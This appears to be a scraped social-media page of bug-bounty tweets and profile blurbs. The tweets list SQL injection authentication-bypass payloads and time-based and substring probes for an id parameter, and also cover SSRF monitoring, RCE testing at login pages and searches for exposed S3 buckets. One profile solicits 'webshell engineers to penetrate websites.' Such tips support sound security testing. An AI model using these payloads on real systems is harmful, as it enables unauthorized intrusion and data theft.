👾✨ New Bugfix Review!
Security researcher @thel4stc0de submitted a critical vulnerability to @AcalaNetwork via Immunefi, securing the protocol for a bounty of $70,000.
Read on and POC for yourself!
buff.ly/9HEw5x4
SQLi - Authentication Bypass Payloads
' and 'one'='one
' group by password having 1=1--
' group by userid having 1=1--
' group by username having 1=1--
like '%'
' or uid like '%
' or uname like '%
' or userid like '%
' or user like '%
' or username like '%
#bugbountytip
SQL injection ID parameter
?id=1' order by 1 --+
?id=1' and "a"="a"--+
?id=1' and database()="securtiy"--+
?id=1' and substring(database(),1,1)="a"--+
?id=1' and sleep(2) and "a"="a"--+
?id=1' and sleep(2) and substring(database(),1,1)="a"--+
#bugbountytips #bugbountytip#sqli
Some SSRF automation tonight !
What the ./monitor.sh does is :
- It watches interactsh.log file in real-time.
- If any interaction ( like a DNS / HTTP request ) is received, it :
- Prints a message.
- Kills your running httpx-toolkit process.
- Then, stops the monitoring.
ㅤ
🔥RCE in Auth Login ☠️
Before testing SQLi, test RCE in login page 😎
Join my telegram channel for more bug bounty and penetration testing
t.me/ShellSec
GrayhatWarfare is a goldmine for hackers! 🔥
With the right queries, I uncovered S3 bucket with backup files of my target that were unintentionally exposed 🤯
Here's a query you can use to check your targets too (authenticated users)
buckets.grayhatwarfare.com/files?keywords…
0 Followers 173 FollowingRecruiting webshell engineers to penetrate websites, with a monthly salary of up to $100,000. If interested, please contact https://t.co/WuI2KPcQFP
5K Followers 4K FollowingApplication Security Engineer, script adult, learner of things, drinker of pints, reader of books, player of guitars. @hacknotcrime Advocate!
25K Followers 26K FollowingA Hacker who is A Lover of People, and Life @RetroTwinz @Secbsd, @GrumpyHackers, @NovaHackers, @deadpixelsec @hacknotcrime Advocate @PositivelyBlue_ OSCP, OSWP
111 Followers 550 Following3 Years Experienced Cyber Security Professional.
Active Bug Hunter.
Security Project Development.
Good in Automated and Manual Testing.
CEH v11 Certified.
8K Followers 85 Followingtech lead @robinhoodapp | ex-@amazonalexa | protected billions in value at @securityOak, @electisec, and more | lackadaisical angel investor
172K Followers 282 FollowingBuilding a transparent defi dashboard at @defillama.
Code llama @llamapay_io @sealed_art @smolrefuel
Would rather be right than make money
106K Followers 4K Following@AlchemixFi @egirl_capital 錬金術師 my tweets are my own ꙮꙮ —not doing angel investments, don’t ask — inventor of the self-repaying loan
143K Followers 2K Followingvery greek accent. general partner & cto @paradigm. ceo @ithacaxyz. optimist and rustacean 🦀 // team lead of reth, foundry, alloy. join us.
3K Followers 317 FollowingBug bounty wizard - All Stars @immunefi. I cast Exorcise on vulnerabilities and Heal on protocols. Prevented exploits worth over $150M.
451 Followers 2K FollowingVideo gamer, Self Certified hacker, Pentester,Just call me Vector.
I am Legion.
This account belongs to a god⚡.
In Christ alone
9K Followers 20 FollowingA Singapore company that discovers vulnerabilities to help customers mitigate the risks of cyber attacks. Organisers of @offbyoneconf